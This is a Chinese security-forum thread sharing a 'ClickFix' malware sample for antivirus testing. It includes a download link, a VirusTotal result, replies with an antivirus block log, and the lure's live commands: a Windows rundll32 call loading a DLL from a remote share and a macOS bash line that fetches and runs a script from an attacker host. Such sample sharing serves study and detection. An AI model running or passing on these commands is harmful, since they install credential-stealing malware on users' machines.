查看: 118|回复: 2
收起左侧

[病毒样本] ClickFIx 1X

[复制链接]
谈谈MEMZ
发表于 1 小时前 | 显示全部楼层 |阅读模式
本帖最后由 谈谈MEMZ 于 2026-3-27 22:58 编辑

衍生物 DLL 1X
@Bocchi通过QQ闪传分享了【verification.zip】
链接:https://qfile.qq.com/q/b1LrmENQL

VT 6/71
https://www.virustotal.com/gui/f ... e96675bc8d1614c76b9

来源 毒网分析区
  1. hxxps://east-timor.org/parliamentary-commission-recommends-unified-federation-for-better-oversight/
复制代码
Windows 执行
  1. rundll32.exe \\plasmapublic.flare-path.in.net\verification.google,#1
  2. 然后输入 I am not a robot - reCAPTCHA Verification ID: 8409199
复制代码
Macos 执行
  1. /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 's69o1bbf.lakeweb.digital/?=check&&actmn=vVWKnqMQJtmmdhRr')"; echo ""BotGuard: Answer the protector challenge. Ref: 42586
复制代码




Cortex Kill






啊松
发表于 半小时前 | 显示全部楼层
不执行了。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 半小时前 | 显示全部楼层
火绒
  1. 风险分类:木马盗号
  2. 访问网址:east-timor.org
  3. 操作结果:已阻止

  4. 进程ID:8100
  5. 操作进程:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  6. 操作进程命令行:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --startup-read-main-dll --metrics-shmem-handle=2440,i,16343961439818734130,17940342845097241225,524288 --field-trial-handle=2160,i,11239000540239754979,15370321415350479724,262144 --variations-seed-version --pseudonymization-salt-handle=2296,i,17190895461550070151,2966495279996812431,4 --trace-process-track-uuid=3190708989122997041 --mojo-platform-channel-handle=2592 /prefetch:3
复制代码


dll扫描运行均未检出
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-27 23:41 , Processed in 0.079529 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表